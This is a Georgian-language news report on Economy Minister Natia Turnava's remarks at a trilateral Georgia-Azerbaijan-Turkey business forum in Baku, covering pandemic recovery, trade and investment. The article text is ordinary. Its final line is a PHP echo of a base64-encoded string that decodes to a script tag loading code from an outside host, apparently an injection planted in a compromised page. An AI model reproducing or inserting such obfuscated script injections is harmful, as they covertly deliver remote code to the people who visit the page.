celsiusi
ავერსი საქკაბელი
საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრი ნათია თურნავა დღეს ბაქოში მიმდინარე საქართველო-აზერბაიჯანი-თურქეთის ბიზნესფორუმს დაესწრო, სადაც გახსნის ოფიციალურ ღონისძიებაზე სამმხრივი ბიზნესფორუმის მნიშვნელობაზე ისაუბრა და აღნიშნა, რომ სამმა ქვეყანამ კერძო სექტორთან ერთად პანდემიის რთული პერიოდის გადალახვა და მომავალ თანამშრომლობაზე აქცენტირება შეძლო.
 
ნათია თურნავამ ფორუმის მონაწილეებს საქართველოს მთავრობის ანტი და პოსტპანდემიური გადაწყვეტილებები მათ შორის ბიზნესის ხელშემწყობის პოლიტიკის კუთხით გააცნო.
 
„ფორუმზე საქართველოდან წარმოდგენილია როგორც უკვე მოქმედი ბიზნესები, სადაც უკვე მონაწილეობს აზერბაიჯანული ან თურქული ინვესტიცია, ასევე ის ბიზნესები, რომელთაც სურთ ახალი ურთიერთობების დამყარება, იქნება ეს სავაჭრო თუ საინვესტიციო კავშირები.
 
ძალიან მნიშვნელოვანია, რომ რეგიონი ახლა ეკონომიკურ აღდგენას განიცდის, გამოდის პანდემიური კრიზისიდან, განსაკუთრებით საქართველო, რომელიც ბიზნესმენებს ორნიშნა ეკონომიკურ ზრდას და სტაბილურ მაკროეკონომიკურ სთავაზობს და ორი ქვეყნის მიერ განიხილება, როგორც საინვესტიციო პლატფორმა და ჩვენ დღეს ამაზე გვქონდა საუბარი. მნიშვნელოვანია, რომ ძალიან აქტიურად მიმდინარეობს ახლა B2B შეხვედრები ორმხრივ და სამმხრივ ფორმატში და დარწმუნებული ვარ, რომ ეს გახდება ახალი საინტერესო პროექტების დასაწყისი“, - აღნიშნა საქართველოს ეკონომიკის მინისტრმა ფორუმის მნიშვნელობაზე საუბრისას.
 
ნათია თურნავას ინფორმაციით, ფორუმის მონაწილეების მხრიდან საქართველოს მიმართ ინტერესი საკმაოდ მაღალია - დაწყებული სოფლის მეურნეობის წარმოებით და გადამუშავებით და დამთავრებული ქიმიური მრეწველობით, საშენ მასალათა წარმოებით, დეველოპმენტით და ა.შ. მინისტრის თქმით, ყველა ამ სფეროში გვყავს ინვესტორები ორივე მეზობელი სახელმწიფოდან და არის შესაძლებლობა, რომ მათი მონაწილეობა კიდევ უფრო მეტად გაფართოვდეს.
 
„მზარდია ჩვენს ქვეყნებს შორის ვაჭრობის სტატისტიკა, ის მიმდინარე წლის განმავლობაში ორნიშნა რიცხვითაა წარმოდგენილი როგორც თურქეთთან, ისე აზერბაიჯანთან. ძალიან სწრაფად ხდება პანდემიის დროს დაზარალებული ეკონომიკური ურთიერთობების აღდგენა, და რა თქმა უნდა, ჩვენ, ეკონომიკური უწყებები ყველანაირად შევუწყობთ ხელს რეგიონში ეკონომიკის განვითარებას და კავშირების განმტკიცებას“, - განაცხადა ეკონომიკის მინისტრმა.
954
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");